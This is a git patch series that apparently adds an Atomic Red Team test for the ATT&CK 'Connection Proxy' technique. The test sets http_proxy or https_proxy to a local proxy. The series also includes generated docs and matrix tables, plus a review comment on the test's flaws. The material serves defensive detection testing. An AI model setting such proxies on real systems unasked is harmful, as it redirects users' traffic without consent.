From 2a1d1fd31b58ae19e60464fa88ce476e0358e45b Mon Sep 17 00:00:00 2001 From: Keith McCammon Date: Sun, 21 Oct 2018 11:31:17 -0600 Subject: [PATCH 1/5] macOS and Linux connection proxy test Configure basic connection proxy on macOS or Linux using http_proxy or https_proxy environment variables. --- atomics/T1090/T1090.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 atomics/T1090/T1090.yaml diff --git a/atomics/T1090/T1090.yaml b/atomics/T1090/T1090.yaml new file mode 100644 index 00000000..0829f135 --- /dev/null +++ b/atomics/T1090/T1090.yaml @@ -0,0 +1,34 @@ +--- +attack_technique: T1090 +display_name: Connection Proxy + +atomic_tests: +- name: Connection Proxy + description: | + Enable traffic redirection. + + To undo changes made by this test: + unset http_proxy + unset https_proxy + + Note that this test may conflict with pre-existing system configuration. + + supported_platforms: + - macos + - linux + + input_arguments: + proxy_server: + description: Proxy server URL (host:port) + type: url + default: 127.0.0.1:8080 + + proxy_scheme: + description: Protocol to proxy (http or https) + type: string + default: http + + executor: + name: sh + command: | + export #{proxy_scheme}_proxy=#{proxy_server} From 44ad3639a99f8b29d4f8ee9e7dbca30b2a18d27d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Sun, 21 Oct 2018 17:34:35 +0000 Subject: [PATCH 2/5] Generate docs from job=validate_atomics_generate_docs branch=t1090-proxy-redirection --- atomics/T1090/T1090.md | 50 +++++++++++++++++++++++ atomics/index.md | 3 +- atomics/index.yaml | 83 +++++++++++++++++++++++++++++++++++++++ atomics/linux-index.md | 3 +- atomics/linux-matrix.md | 2 +- atomics/macos-index.md | 3 +- atomics/macos-matrix.md | 2 +- atomics/matrix.md | 2 +- atomics/windows-index.md | 2 +- atomics/windows-matrix.md | 2 +- 10 files changed, 144 insertions(+), 8 deletions(-) create mode 100644 atomics/T1090/T1090.md 
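Review bot: The `export` on the last added line of the T1090.yaml hunk only sets `#{proxy_scheme}_proxy` inside the executor's own `sh` process, so when the executor returns nothing on the host is proxied and the cleanup the description gives (`unset http_proxy` / `unset https_proxy`) has nothing to undo; because `export` is a shell builtin the test as written also leaves no process or network event for a detection engineer to look for. If the test is meant to exercise the proxy, the same command should drive a request through it, e.g. `export #{proxy_scheme}_proxy=#{proxy_server}` followed by `curl -s -o /dev/null #{proxy_scheme}://example.com` (constructed target URL), and the undo instructions should be dropped or reworded to say the variable is scoped to that shell. Separately, `proxy_scheme` is typed `string` but is spliced into a variable name, so any value other than `http` or `https` silently exports an unrelated variable; its `description` should state that only those two values have an effect, and `proxy_server` is typed `url` while its default `127.0.0.1:8080` carries no scheme.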
diff --git a/atomics/T1090/T1090.md b/atomics/T1090/T1090.md new file mode 100644 index 00000000..a9fd73b0 --- /dev/null +++ b/atomics/T1090/T1090.md @@ -0,0 +1,50 @@ +# T1090 - Connection Proxy +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1090) +
A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) + +The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other. + +The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. + +Detection: Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious. + +Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) + +Platforms: Linux, macOS, Windows + +Data Sources: Process use of network, Process monitoring, Netflow/Enclave netflow, Packet capture + +Requires Network: Yes + +Contributors: Walker Johnson
+ +## Atomic Tests + +- [Atomic Test #1 - Connection Proxy](#atomic-test-1---connection-proxy) + + +
+ +## Atomic Test #1 - Connection Proxy +Enable traffic redirection. + +To undo changes made by this test: + unset http_proxy + unset https_proxy + +Note that this test may conflict with pre-existing system configuration. + +**Supported Platforms:** macOS, Linux + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080| +| proxy_scheme | Protocol to proxy (http or https) | string | http| + +#### Run it with `sh`! +``` +export #{proxy_scheme}_proxy=#{proxy_server} +``` +
diff --git a/atomics/index.md b/atomics/index.md index 837bfc9f..e31d76f4 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -620,7 +620,8 @@ # command-and-control - T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1090 Connection Proxy](./T1090/T1090.md) + - Atomic Test #1: Connection Proxy [macos, linux] - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1132 Data Encoding](./T1132/T1132.md) diff --git a/atomics/index.yaml b/atomics/index.yaml index 1ab8b19d..2378caf9 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml 
@@ -16877,6 +16877,89 @@ command-and-control: modified: '2018-04-18T17:59:24.739Z' type: attack-pattern atomic_tests: [] + T1090: + technique: + name: Connection Proxy + description: |- + A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) + + The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other. + + The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. + + Detection: Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious. + + Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 
(Citation: University of Birmingham C2) + + Platforms: Linux, macOS, Windows + + Data Sources: Process use of network, Process monitoring, Netflow/Enclave netflow, Packet capture + + Requires Network: Yes + + Contributors: Walker Johnson + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + external_references: + - url: https://attack.mitre.org/wiki/Technique/T1090 + source_name: mitre-attack + external_id: T1090 + - description: 'Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools + of the Trade. Retrieved December 2, 2015.' + source_name: Trend Micro APT Attack Tools + url: http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/ + - description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command + & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. + source_name: University of Birmingham C2 + url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:31:08.479Z' + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - Process use of network + - Process monitoring + - Netflow/Enclave netflow + - Packet capture + x_mitre_network_requirements: true + x_mitre_contributors: + - Walker Johnson + id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea + modified: '2018-04-18T17:59:24.739Z' + type: attack-pattern + identifier: T1090 + atomic_tests: + - name: Connection Proxy + description: | + Enable traffic redirection. + + To undo changes made by this test: + unset http_proxy + unset https_proxy + + Note that this test may conflict with pre-existing system configuration. 
+ supported_platforms: + - macos + - linux + input_arguments: + proxy_server: + description: Proxy server URL (host:port) + type: url + default: 127.0.0.1:8080 + proxy_scheme: + description: Protocol to proxy (http or https) + type: string + default: http + executor: + name: sh + command: 'export #{proxy_scheme}_proxy=#{proxy_server} + +' T1132: technique: name: Data Encoding diff --git a/atomics/linux-index.md b/atomics/linux-index.md index 392916eb..cd4dcb71 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md @@ -193,7 +193,8 @@ # command-and-control - T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1090 Connection Proxy](./T1090/T1090.md) + - Atomic Test #1: Connection Proxy [macos, linux] - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1132 Data Encoding](./T1132/T1132.md) diff --git a/atomics/linux-matrix.md b/atomics/linux-matrix.md index 0a154d84..eda75b47 100644 --- a/atomics/linux-matrix.md +++ b/atomics/linux-matrix.md 
@@ -3,7 +3,7 @@ |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Bash History](./T1139/T1139.md) | [Account Discovery](./T1087/T1087.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](./T1055/T1055.md) | [Clear Command History](./T1146/T1146.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | [Setuid and Setgid](./T1166/T1166.md) | [Disabling Security Tools](./T1089/T1089.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Remote File Copy](./T1105/T1105.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | [Setuid and Setgid](./T1166/T1166.md) | [Disabling Security Tools](./T1089/T1089.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Remote File Copy](./T1105/T1105.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) | | [Spearphishing Attachment](./T1193/T1193.md) | [Local Job Scheduling](./T1168/T1168.md) | [Create Account](./T1136/T1136.md) | [Sudo](./T1169/T1169.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](./T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](./T1064/T1064.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Sudo Caching](./T1206/T1206.md) | [File Deletion](./T1107/T1107.md) | [Input Capture](./T1056/T1056.md) | [Password Policy Discovery](./T1201/T1201.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Source](./T1153/T1153.md) | 
Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](./T1148/T1148.md) | [Network Sniffing](./T1040/T1040.md) | [Permission Groups Discovery](./T1069/T1069.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) | diff --git a/atomics/macos-index.md b/atomics/macos-index.md index 0fcb3e78..46850fe6 100644 --- a/atomics/macos-index.md +++ b/atomics/macos-index.md @@ -235,7 +235,8 @@ # command-and-control - T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1090 Connection Proxy](./T1090/T1090.md) + - Atomic Test #1: Connection Proxy [macos, linux] - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1132 Data Encoding](./T1132/T1132.md) diff --git a/atomics/macos-matrix.md b/atomics/macos-matrix.md index 5f460d02..5ec53e51 100644 --- a/atomics/macos-matrix.md +++ b/atomics/macos-matrix.md 
@@ -3,7 +3,7 @@ |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](./T1155/T1155.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Bash History](./T1139/T1139.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](./T1155/T1155.md) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [Browser Extensions](./T1176/T1176.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](./T1146/T1146.md) | [Brute Force](./T1110/T1110.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](./T1081/T1081.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](./T1081/T1081.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) | | [Spearphishing Attachment](./T1193/T1193.md) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](./T1150/T1150.md) | [Disabling Security Tools](./T1089/T1089.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](./T1152/T1152.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Process Injection](./T1055/T1055.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | [Network Service Scanning](./T1046/T1046.md) | [Remote File Copy](./T1105/T1105.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Job Scheduling](./T1168/T1168.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | [File Deletion](./T1107/T1107.md) | [Input Prompt](./T1141/T1141.md) | [Network Share Discovery](./T1135/T1135.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) | diff --git a/atomics/matrix.md b/atomics/matrix.md index c738f0e5..1961a020 100644 --- a/atomics/matrix.md +++ b/atomics/matrix.md 
@@ -3,7 +3,7 @@ |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](./T1155/T1155.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](./T1155/T1155.md) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Bash History](./T1139/T1139.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) | | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](./T1083/T1083.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Spearphishing Attachment](./T1193/T1193.md) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Files](./T1081/T1081.md) | [Network Service Scanning](./T1046/T1046.md) | [Logon Scripts](./T1037/T1037.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication 
Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](./T1088/T1088.md) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Share Discovery](./T1135/T1135.md) | [Pass the Hash](./T1075/T1075.md) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) | diff --git a/atomics/windows-index.md b/atomics/windows-index.md index a767df04..372264d3 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -443,7 +443,7 @@ # command-and-control - T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1090 Connection Proxy](./T1090/T1090.md) - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1132 Data Encoding](./T1132/T1132.md) diff --git a/atomics/windows-matrix.md b/atomics/windows-matrix.md index 097ca128..304619ed 100644 --- a/atomics/windows-matrix.md +++ b/atomics/windows-matrix.md 
@@ -3,7 +3,7 @@ |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Brute Force](./T1110/T1110.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) | | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Spearphishing Attachment](./T1193/T1193.md) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Service Scanning](./T1046/T1046.md) | [Pass the Hash](./T1075/T1075.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
